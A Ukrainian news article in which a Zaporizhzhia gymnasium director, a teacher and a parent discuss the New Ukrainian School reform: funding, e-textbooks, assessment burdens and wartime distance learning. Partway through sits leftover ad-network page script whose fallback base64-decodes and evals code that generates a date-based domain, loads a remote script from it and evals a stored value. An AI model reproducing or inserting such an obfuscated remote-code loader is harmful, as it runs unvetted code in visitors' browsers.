Чи не всі вчителі, батьки та директори говорять про те, що на початку впровадження реформи НУШ було складно. Мовляв, реформа кардинально змінила підходи, форми, методи й організацію освітнього процесу.
ЗАПОРІЗЬКА ГІМНАЗІЯ № 25
Директорка Марина Луценко:
У гімназії вчиться приблизно 550 учнів, а в НУШ – орієнтовно 350 учнів, 12 класів. Коли ми починали впроваджувати НУШ, нам не було складно. Команда учителів дружна і творча, вони потребували цих змін, як і діти. До того ж ми зрозуміли, що багато з методик НУШ використовували в навчанні давно.
Звісно, вчителям треба було трішки переналаштуватися, адже концепція відрізняється. Наприклад, педагоги багато років оцінювали учнів за бальною системою, а тут треба зрозуміти концепт формувального оцінювання. Але все це ми пройшли, система НУШ у нашому закладі працює злагоджено.
Оскільки Запоріжжя – недалеко від лінії фронту, з 1 вересня учні гімназії на дистанційному навчанні. За відгуками вчителів, нічого не заважає працювати з принципами та засадами НУШ онлайн. Єдина проблема – відключення світла, але так живе вся країна. За субвенцією НУШ, усіх учителів забезпечили ноутбуками, тож це допомагає їм і тепер.
Щороку на розвиток НУШ ми отримуємо кошти. Нам вдалося зробити ремонт кабінетів, отримати парти, стільці, стелажі, роздаткові матеріали, ігри, посібники, LEGO тощо. Поступово щороку ми покращували матеріально-технічну базу. А тепер забезпечені всі класи НУШ.
До того ж наша школа активно займається фандрейзингом – ми подаємо грантові заявки. Наприклад, у міському громадському бюджеті ми беремо участь упродовж 5 років. Завдяки цьому облаштували середовище на вулиці, навколо школи (безпечні тротуари), за грантовою програмою міста виграли тренажери й облаштували спортивний майданчик, в інших проєктах виграли проєктори.
Окрім цього, 1–4 класи на 100 % забезпечені підручниками. Я викладаю предмет “Здоров’я, добробут, безпека”, ми могли вибрати підручник серед тих, які створили творчі групи. І я ним дуже задоволена! Підручник став кращим. Він справді орієнтується на сучасних дітей, які добре знайомі із цифровими технологіями, є багато QR-кодів, цікавих інтерактивних завдань. І це – лише один приклад.
Для 5 класу підручники є тільки в електронному варіанті, але нас це поки влаштовує, адже ми вчимося дистанційно.
А от оцінювання в НУШ, як на мене, треба доопрацювати. Наприклад, діти написали контрольну з математики із цікавими завданнями практичного спрямування. Але в контрольній 6 завдань, а в кожному з них запитання на різні компетенції. Вчителю треба креслити табличку по кожній компетенцій, множити на кількість завдань і описувати рівень кожного учня. Щоби оцінити рівень кожної компетенції в кожної дитини, витрачається дуже багато часу.
Щодо підготовки вчителів – у Запоріжжі добре працює інститут післядипломної освіти для вчителів. Вони якісно спрацювали ще на етапі підготовки до НУШ, коли ми лише набирали перші класи. Тож усі вчителі гімназії пройшли курси підготовки для роботи за програмою НУШ.
Курси були не на базі інституту, а в різних школах. Ми мали можливість почути про досвід вчителів і директорів у пілоті НУШ, а також послухати тренерів. Окрім цього, були управлінські курси, окремо – для вчителів початкової школи, окремо – для вчителів-предметників.
У НУШ нам бракує вільного часу. Війна це підтвердила, додалося багато викликів:
треба більше часу на підготовку до онлайн-уроків, аби все було різноманітно та цікаво;учителі продовжують проходити різні курси, щоби опановувати цифрові технології та викладати уроки якісно;багато часу витрачається на перевірку робіт, спілкування з дітьми, щоби дотримуватися принципів НУШ;всі вчителі ще й волонтерять – наприклад, на території шкіл Запоріжжя створені інформаційні центри, там ми допомагаємо людям, які приїхали в наше місто, чи, за потреби, місцевому населенню.
Попри все, реформа НУШ дуже потрібна школам і дітям насамперед. Нове покоління дітей зовсім не таке, як діти 10 чи 15 років тому. За старими підручниками та програмами їм було б нудно навчатися. Закінчувати реформу НУШ на тому, до чого ми вже дійшли, однозначно не можна. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Учителька української мови в 5 класі Олександра Біла:
Ми були дуже добре підготовлені до НУШ, мали багато вебінарів, Запорізький інститут підвищення кваліфікації проводив різні навчальні заходи. Усе починалося добре.
Вчителів 5 класів НУШ, як і мене, насамперед турбує методичне забезпечення. У мене склалося враження, що ми залишилися кинуті напризволяще. Є дуже багато запитань, до яких немає конкретних відповідей, тим паче зафіксованих нормативно, щоби ми мали змогу опиратися на якісь конкретні рекомендації чи документи.
Наприклад, у методичній базі мало б бути добре розкрите питання критеріїв оцінювання. Нині критерії – надто загальні. Кожен учитель як хоче, так і робить. Як на мене, це неправильно. Адже до певних видів робіт, як-от аудіювання, переказ, діалог у всіх учителів мають бути однакові критерії.
Нині ми завершуємо семестр і я стикнулася ще з однією проблемою щодо оцінювання результатів навчання. Це – нововведення для середньої школи НУШ. До такого оцінювання немає критеріїв узагалі. Деякі результати навчання дублюють ті види робіт, які ми проводимо та оцінюємо. Виходить, начебто подвійне оцінювання. А навіщо?
Щодо підручників: те, що вони електронні, – це не проблема. Натомість проблема в тому, що вони недопрацьовані. Наприклад, буває водяний знак розташований так, що затуляє сторінку. Ми ж робимо сканкопію або дитина заходить сама за посиланням. Як читати такий текст? Доводиться шукати підручники без цього логотипу. Але ж це порушення авторського права.
До того ж остання частина в підручнику з української мови художньо не оформлена. Це – наче чорновий варіант. Є редакторські вставки, як от слово “плашка”. Якість сторінок – також подекуди погана.
Мама третьокласниці Світлана Левицька:
Загалом НУШ – трохи не така, як ми звикли. У першому класі донька не вчила табличку множення, а в третьому – дроби.
У нас є всі підручники, усі нові й гарні – із цим проблем немає. У межах програми НУШ стало значно більше цікавих практичних завдань, які знадобляться в житті. Також дуже багато творчих завдань. Наприклад, ми знімаємо для вчителя відео переказів і казки в ролях. Діти вчаться висловлювати свою думку, а не читають і заучують. Ми проводимо багато дослідів і спостережень, наприклад, вирощуємо цибулю.
До оцінювання в НУШ також інший підхід – і до нього треба звикнути насамперед батькам. Мені спочатку було незрозуміло: моя донька відмінниця чи ні. Допомагало те, що вчителька писала коментарі до оцінок, часом дуже розлогі. Я навіть не знаю, скільки треба виділити часу, щоби написати коментар кожному учневі. Нині вже є рівні, батькам так легше. Однак мою доньку все влаштовує, бо вона не знала іншого. Вона знає, що в неї високий рівень і їй байдуже – це 10, 11 чи 12.
За матеріалами https://nus.org.ua/ (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/yak-vprovadzhuyut-reformu-nush-u-zaporizkij-gimnaziyi-rozpovid-direktorki/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook